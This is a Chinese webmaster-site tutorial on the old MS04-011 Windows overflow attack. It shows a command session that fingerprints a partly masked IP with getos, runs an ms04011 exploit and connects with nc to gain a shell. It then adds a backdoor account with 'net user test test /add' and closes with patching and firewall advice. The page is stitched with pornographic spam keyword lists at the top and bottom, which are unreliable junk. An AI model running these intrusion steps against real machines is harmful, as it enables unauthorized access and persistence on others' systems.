青草久久影院-青草久久伊人-青草久久久-青草久久精品亚洲综合专区-SM双性精跪趴灌憋尿调教H-SM脚奴调教丨踩踏贱奴

17站長網

17站長網 首頁 安全 安全教程 查看內容

系統漏洞溢出攻擊實例(圖)

2022-9-24 09:55| 查看: 1756 |來源: 互聯網

我們來看一下以前比較精典的一個溢出實例ms04011溢出: Microsoft Windows XP (C) 版權所有 1985-2001 Microsoft Corp. C:\windows\system32\cd\ C:\> ...

我們來看一下以前比較精典的一個溢出實例ms04011溢出:
Microsoft Windows XP [版本 5.1.2600]
(C) 版權所有 1985-2001 Microsoft Corp.
C:\windows\system32\cd\
C:\>
C:\>getos 2**.159.31.96   (判斷操作系統)
----------------------------
THCsmbgetOS v0.1 - gets gro
by Johnny Cyberpunk (
----------------------------
[*] Connecting Port 139....
[*] Sending session request.
[*] Sending negotiation requ
[*] Sending setup account re
[*] Successful....
Remote OS:
----------
WORKGROUP
Windows 2000 LAN Manager
Windows 5.1
C:\>
C:\>ms04011 1 2**.159.31.96 (溢出格式)
shellcode size 404
Ret value = 1727
C:\>
C:\>nc 2**.159.31.96 1234  (nc進行連接)
Microsoft Windows XP [版本 5.1.2600]
(C) 版權所有 1985-2001 Microsoft Corp.
D:\WINDOWS\system32> (得到目標機shell)
D:\WINDOWS\system32>net user test  test /add
net user test test /add
命令成功完成。  (建立用戶)
上面只是簡單演示了一下溢出過程,上例是正向溢出,只是直接溢出后用nc進行連接,還可以反向溢出,反向溢出一般用來突破防火墻,先用nc在本機監聽一個端口,等待反向溢出的服務器連接過來從而得到一個system權限的shell。對于溢出還有很多,如iis、mso4045、ms04049、ms05039、ms05051、ms06061等還有一些精典的應用程序遠程溢出,如未打sp3的mssql遠程溢出可以直接得到系統權限。還有imail服務也一樣可以通過遠程溢出獲得系統權限。還有很多病毒如沖擊波、震蕩波等病毒都是利用的rpc和lsass溢出漏洞,在感染一臺機器后又不斷的以此機器為節點掃描網絡中的其它存在漏洞的機器進行溢出植入病毒程序,這樣不斷的繁殖下去。
不過在windiws2003下溢出就無用武之地了,因為在2003的保護機制里面還有一個技術是可控的SEH處理函數指針,2003中結構化異常處理例程注冊后,它的函數指針會保存在模塊中的一個叫Load Configuration Directory的地址列表中,如果函數返回時系統發現堆棧中的Cookie發生了改變,視為溢出,系統就會查看當前線程相關的SEH中是否有相應的處 理函數指針,有的話,系統將該指針與已經注冊過函數的地址列表進行對照,如果沒有發現匹配的,而且處理函數指針在堆棧中,異常處理函數就不運行。如果該處 理函數指針位于已加載的各個DLL模塊地址范圍只外,或堆中,處理函數會被執行,這種可控制的異常處理技術就會使傳統的覆蓋SEH指針的方法失敗。雖然可以用已經加載模塊以外的地址來覆蓋SHE但在遠程溢出中仍顯得無力。
我們再來看看本地溢出,本地溢出主要用來進行權限提升,前面的serv-u的本地溢出已經注入中講解了,我們現在再來看一下本地的一個特權提升漏洞,如圖:

通過執行本地溢出直接從user用戶提升到系統權限。
對溢出攻擊的安全防范:
關閉139端口,停掉icp/ip netbios服務。
在本地連接的屬性窗口中tcp/ip協議中的高級選項里“禁用tcp/ip上的netbios(s)”因為很多溢出都是利用的這個通道。
安裝防火墻是必要的。
打上重要漏洞的補丁(如沖擊波補丁、震蕩波補丁),并開啟系統的自動更新功能。
服務器使用windows2003系統。

本文最后更新于 2022-9-24 09:55,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 青青草原国产在线观看 | 国产精人妻无码一区麻豆 | 厨房玩朋友娇妻中文字幕 | 六月婷婷国产精品综合 | 一本道本线中文无码 | 亚洲精品国产高清嫩草影院 | 免费毛片视频网站 | 扒开美女的内衣亲吻漫画 | 亚洲日韩乱码人人爽人人澡人 | 两个人在线观看的视频720 | 性色爽爱性色爽爱网站 | 草699一码二码三码四码 | xvideos中文版在线视频 | 久久精品无码一区二区日韩av | 精品久久久99大香线蕉 | 北岛玲手机在线观看视频观看 | 乳巨揉みま痴汉电车中文字幕动漫 | yellow日本动漫高清 | 国产成人精品s8p视频 | 国产美女一区二区 | 妈妈的职业3完整版在线播放 | 又黄又湿免费高清视频 | 柠檬福利精品视频导航 | 成 人 免费 黄 色 网站无毒下载 | 99视频免费观看 | 国产色欲一区二区精品久久呦 | 天天澡夜夜澡人人澡 | 男女午夜性爽快免费视频不卡 | 蜜柚视频在线观看全集免费观看 | 两个人在线观看的视频720 | 男女作爱在线播放免费网页版观看 | 视频一区精品自拍亚洲 | 亚洲国产日韩欧美视频二区 | 国产美熟女乱又伦AV | 欧美高清vivoesosexo18 | 在线视频 国产 日韩 欧美 | 伊人久久一本 | 国产精品久久久久秋霞影视 | 国产成人无码WWW免费视频在线 | 好紧好湿太硬了我太爽了文字 | 高H短篇辣肉纯肉 |